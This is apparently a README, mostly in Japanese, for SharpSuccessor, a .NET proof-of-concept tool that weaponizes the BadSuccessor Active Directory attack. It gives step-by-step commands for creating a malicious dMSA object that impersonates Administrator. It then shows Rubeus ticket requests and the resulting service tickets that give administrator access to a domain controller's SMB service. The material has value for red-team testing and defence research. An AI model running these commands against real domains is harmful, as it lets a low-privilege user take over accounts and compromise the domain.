
SharpSuccessor is a .NET Proof of Concept (POC) for fully weaponizing Yuval Gordon’s (@YuG0rd) BadSuccessor attack from Akamai.
SharpSuccessor は、Akamai による Yuval Gordon(@YuG0rd)の BadSuccessor 攻撃を完全に武器化するための .NET Proof of Concept(POC)です。Active Directory ドメイン内の任意の組織単位(OU)に対する CreateChild 権限と、ターゲットオブジェクトへの書き込みアクセスを持つ低権限ユーザーは、アカウント乗っ取りを実行できます。
SharpSuccessor を使用して、dMSA オブジェクトを追加して武器化し、偽装したいターゲットアカウントに適切な属性を書き込みます:
SharpSuccessor.exe add /impersonate:Administrator /path:"ou=test,dc=lab,dc=lan" /account:jdoe /name:attacker_dMSA

現在のユーザーコンテキストとして TGT を要求します(この場合は jdoe):
Rubeus.exe tgtdeleg /nowrap

次に、その tgt を使用して dMSA アカウントを偽装します:
Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIFTDCCB.....

これで、任意の SPN に対して Administrator コンテキストのサービスチケットを要求できます。これには、侵害後(post-exploitation)のためのドメインコントローラーも含まれます。たとえば、ここではドメインコントローラー上の SMB に対する管理者権限を示します:
Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/WIN-RAEAN26UGJ5.lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIF2DCCBdS...

チケットがメモリ上にあるので、アクセスをテストできます:

このツールの着想と支援に対して、Jim Sykora と Garrett Foster に多大な感謝を捧げます!